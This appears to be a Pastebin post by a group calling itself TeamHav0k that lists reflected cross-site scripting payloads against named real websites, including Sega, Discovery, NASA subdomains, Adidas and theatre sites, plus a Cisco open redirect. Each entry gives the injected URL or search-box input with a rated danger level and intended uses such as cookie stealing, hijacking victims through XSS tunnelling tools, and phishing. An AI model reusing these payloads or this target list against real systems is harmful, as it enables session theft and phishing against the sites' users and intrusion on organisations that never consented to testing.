Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -TeamHav0k-
- We just got bored and started searching around for XSS, we found a few and a Cisco redirect vuln. Some targets include: NASA, Sega, verizon, Cisco.
- ----------
- Target: Sega.com
- http://us.download-shop.sega.com/search.html
- Syntax: In searchbar type "/><script>alert(1)</script>
- Danger Level: Low
- Usage: non
- Target: Discovery.com
- http://animal.discovery.com/search/results.html?focus=site&query=</TITLE><SCRIPT>alert("XSS");</SCRIPT>&search=+
- Danger Level: High
- Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF victims.
- Target: Bestbuy.com
- http://bestbuytheater.com/eventdetail.php?id=30563'"><script>alert('1')</script>
- Danger Level: High
- Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF victims.
- Target: Verizon.com
- http://verizontheatre.com/events/eventdetail.php?id=31557</script>'"><script>alert('1')</script>
- Danger Level: High
- Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
- Target: NASA.gov
- http://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=<script>alert('1')</script>
- http://technologygateway.nasa.gov/index.cfm?fuseaction="><script>alert('1')</script>
- http://spaceflight.nasa.gov/cgi-bin/acronyms.cgi
- searchdata=<script>alert(1)</script>&submit=Search&program=shuttle&searchall=false
- Dange Level: High
- Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
- Target: adidas.com
- catalogue.adidas.com/catalogue/ae/products/?keywords="; alert(1); test="test
- Dange Level: High
- Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
- Target: Cisco.com
- http://www.cisco.com/survey/exit.html?http://twitter.com/
- Danger Level: High
- Usage: Phishing.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement